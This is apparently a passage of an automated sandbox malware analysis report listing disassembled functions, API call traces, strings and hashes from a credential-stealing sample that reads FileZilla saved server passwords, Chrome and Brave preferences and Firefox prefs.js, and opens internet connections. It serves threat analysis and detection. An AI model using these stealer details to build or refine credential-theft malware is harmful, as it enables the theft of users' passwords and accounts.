                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 1006159827-1013718255
                            • Opcode ID: 31d7a2c20cb8b8617ada87d1a200cd96ecc03173bc21382382917b98d949e198
                            • Instruction ID: c17715f4a4842e8fe666e3dff1361295290ce2bb645a9989f62d68a275374d58
                            • Opcode Fuzzy Hash: 31d7a2c20cb8b8617ada87d1a200cd96ecc03173bc21382382917b98d949e198
                            • Instruction Fuzzy Hash: 7D627A3191165AABCB21AF79CC48AAFB7B9FF45700F448128BA05E3251DF74EE41CB91
                            Function 008F6AA0 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F6AD5
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008F6B08
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6B42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6B69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F6B74
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6B9D
                            • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 008F6BB7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6BD9
                            • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 008F6BE5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6C10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6C40
                            • LocalAlloc.KERNEL32(00000040,?), ref: 008F6C75
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F6CDD
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F6D0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 313953988-555421843
                            • Opcode ID: 506eb60b8f98fd599e16dd4c67befd67216696d6b40a7bf8d711b929c4786567
                            • Instruction ID: 86b4368a407828dc5745b510581499715ef16698c99accdb7ab608ffe39a19cf
                            • Opcode Fuzzy Hash: 506eb60b8f98fd599e16dd4c67befd67216696d6b40a7bf8d711b929c4786567
                            • Instruction Fuzzy Hash: 1042C171A0025AAFDB21ABB5DC49FAE7BB9FF45700F444524FA01E7281EF70D9128B61
                            Function 008E60D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E60FF
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E6152
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E6185
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E61B5
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E61F0
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008E6223
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008E6233
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 47fe3005cd663e7528679c2a26c8981cac9d45f3bd6951f302a1f0cc2180f5c7
                            • Instruction ID: e78a40140879c8a5f562f70ef6932e33a55950b1117435f2d968bb6eabbfa62f
                            • Opcode Fuzzy Hash: 47fe3005cd663e7528679c2a26c8981cac9d45f3bd6951f302a1f0cc2180f5c7
                            • Instruction Fuzzy Hash: 1F527C71D00256AFCB21ABB9DC49BAE77B9FF56350F148024F805E7291EB74ED028B91
                            Function 008F6CB9 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F6CDD
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F6D0D
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F6D3D
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F6D6F
                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 008F6D7C
                            • RtlAllocateHeap.NTDLL(00000000), ref: 008F6D83
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 008F6D9A
                            • lstrlen.KERNEL32(00000000), ref: 008F6DA5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6DE8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6E0F
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 008F6E22
                            • lstrlen.KERNEL32(00000000), ref: 008F6E2D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6E70
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6E97
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 008F6EAA
                            • lstrlen.KERNEL32(00000000), ref: 008F6EB5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6EF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6F1F
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008F6F32
                            • lstrlen.KERNEL32(00000000), ref: 008F6F41
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6F89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F6FB1
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008F6FD4
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 008F6FE8
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 008F7009
                            • LocalFree.KERNEL32(00000000), ref: 008F7014
                            • lstrlen.KERNEL32(?), ref: 008F70AE
                            • lstrlen.KERNEL32(?), ref: 008F70C1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 2641759534-2314656281
                            • Opcode ID: 96e5ff66b758e6a28234edf1d04f2d378d2fdfe48edbc475c11cff2296ee123d
                            • Instruction ID: fa9597fba214c9ef87751bdccec6aa7834ddc36808913c54c446d0dc472789da
                            • Opcode Fuzzy Hash: 96e5ff66b758e6a28234edf1d04f2d378d2fdfe48edbc475c11cff2296ee123d
                            • Instruction Fuzzy Hash: B602EF71A0025AAFDB20ABB4DC49FAE7BB9FF49700F544524F902E7281EF70D9128761
                            Function 008EDB80 Relevance: 92.3, APIs: 48, Strings: 4, Instructions: 1271stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008EDBD3
                            • lstrcpy.KERNEL32(00000000,?), ref: 008EDC1E
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008EDC5F
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008EDC8F
                            • FindFirstFileA.KERNEL32(?,?), ref: 008EDCA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindFirst
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 157892242-726946144
                            • Opcode ID: 80dd9c050da7de6494d8fbbfbbe47a8909d52e4b455d8cf6632638244dc360f5
                            • Instruction ID: 327c74df2d93d469b8085486b3ab434b71c9186d6d8e355b0192b3c6484046ab
                            • Opcode Fuzzy Hash: 80dd9c050da7de6494d8fbbfbbe47a8909d52e4b455d8cf6632638244dc360f5
                            • Instruction Fuzzy Hash: 47B2A171A013959FCB24EF6AD844A9ABBF5FF49314F188168E809E7391DB70EC45CB81
                            Function 008F4C70 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F4CB1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4CD4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F4CDF
                            • lstrlen.KERNEL32(00914CAC), ref: 008F4CEA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4D07
                            • lstrcat.KERNEL32(00000000,00914CAC), ref: 008F4D13
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F4D3E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008F4D5A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: prefs.js
                            • API String ID: 2567437900-3783873740
                            • Opcode ID: b5b29237676502be58061e02f472686249eeb0264eeed3757913c85c03d47a51
                            • Instruction ID: ccd77b99d1ac1f418e142524ed42eed78cd162ae7b7777c6b570031b46138c78
                            • Opcode Fuzzy Hash: b5b29237676502be58061e02f472686249eeb0264eeed3757913c85c03d47a51
                            • Instruction Fuzzy Hash: 4D925C70A016099FDB24DF29C958A6AB7E5FF44714F19C0ADEA09DB3A1DB71DC82CB40
                            Function 008F13A0 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F13E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1404
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F140F
                            • lstrlen.KERNEL32(00914CAC), ref: 008F141A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1437
                            • lstrcat.KERNEL32(00000000,00914CAC), ref: 008F1443
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F146E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 008F148A
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008F14AC
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008F14C6
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008F14FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1527
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008F1532
                            • lstrlen.KERNEL32(0091179C), ref: 008F153D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F155A
                            • lstrcat.KERNEL32(00000000,0091179C), ref: 008F1566
                            • lstrlen.KERNEL32(?), ref: 008F1573
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1593
                            • lstrcat.KERNEL32(00000000,?), ref: 008F15A1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F15CA
                            • StrCmpCA.SHLWAPI(?,012FDF20), ref: 008F15F3
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1634
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F165D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1685
                            • StrCmpCA.SHLWAPI(?,012FE0A0), ref: 008F16A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F16E3
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F170C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1734
                            • StrCmpCA.SHLWAPI(?,012FDF50), ref: 008F1752
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1783
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F17AC
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F17D5
                            • StrCmpCA.SHLWAPI(?,012FDEC0), ref: 008F1803
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1844
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F186D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F1895
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F18E6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008F190E
                            • lstrcpy.KERNEL32(00000000,?), ref: 008F1945
                            • FindNextFileA.KERNEL32(00000000,?), ref: 008F196C
                            • FindClose.KERNEL32(00000000), ref: 008F197B
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: 885cec85527c2adb355aaaa2705fc317cdca72dff9dfef9facaf4e9c9648b2b8
                            • Instruction ID: 78ce7b3b0234dcab00e1bc7c81ea3dd471a983f1ef7e45243eefaf39f3d20e56
                            • Opcode Fuzzy Hash: 885cec85527c2adb355aaaa2705fc317cdca72dff9dfef9facaf4e9c9648b2b8
                            • Instruction Fuzzy Hash: 32126A71A1024A9BCF24AF79D89DAAE7BB8FF44300F448528A946E7251DF34DD418B91
                            Function 008FCDD0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 008FCDEC
                            • FindFirstFileA.KERNEL32(?,?), ref: 008FCE03
                            • lstrcat.KERNEL32(?,?), ref: 008FCE4F
                            • StrCmpCA.SHLWAPI(?,009117A8), ref: 008FCE61
                            • StrCmpCA.SHLWAPI(?,009117AC), ref: 008FCE7B
                            • wsprintfA.USER32 ref: 008FCEA0
                            • PathMatchSpecA.SHLWAPI(?,012F9350), ref: 008FCED2
                            • CoInitialize.OLE32(00000000), ref: 008FCEDE
                              • Part of subcall function 008FCCD0: CoCreateInstance.COMBASE(0090B118,00000000,00000001,0090B108,?), ref: 008FCCF6
                              • Part of subcall function 008FCCD0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 008FCD36
                              • Part of subcall function 008FCCD0: lstrcpyn.KERNEL32(?,?,00000104), ref: 008FCDB9
                            • CoUninitialize.COMBASE ref: 008FCEF9
                            • lstrcat.KERNEL32(?,?), ref: 008FCF1E
                            • lstrlen.KERNEL32(?), ref: 008FCF2B
                            • StrCmpCA.SHLWAPI(?,0090CFF4), ref: 008FCF45
                            • wsprintfA.USER32 ref: 008FCF6D
                            • wsprintfA.USER32 ref: 008FCF8C
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 008FCFA0
                            • wsprintfA.USER32 ref: 008FCFC8
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 008FCFE1
                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 008FD000
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 008FD018
                            • CloseHandle.KERNEL32(00000000), ref: 008FD023
                            • CloseHandle.KERNEL32(00000000), ref: 008FD02F
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008FD044
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FD084
                            • FindNextFileA.KERNEL32(?,?), ref: 008FD17D
                            • FindClose.KERNEL32(?), ref: 008FD18F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
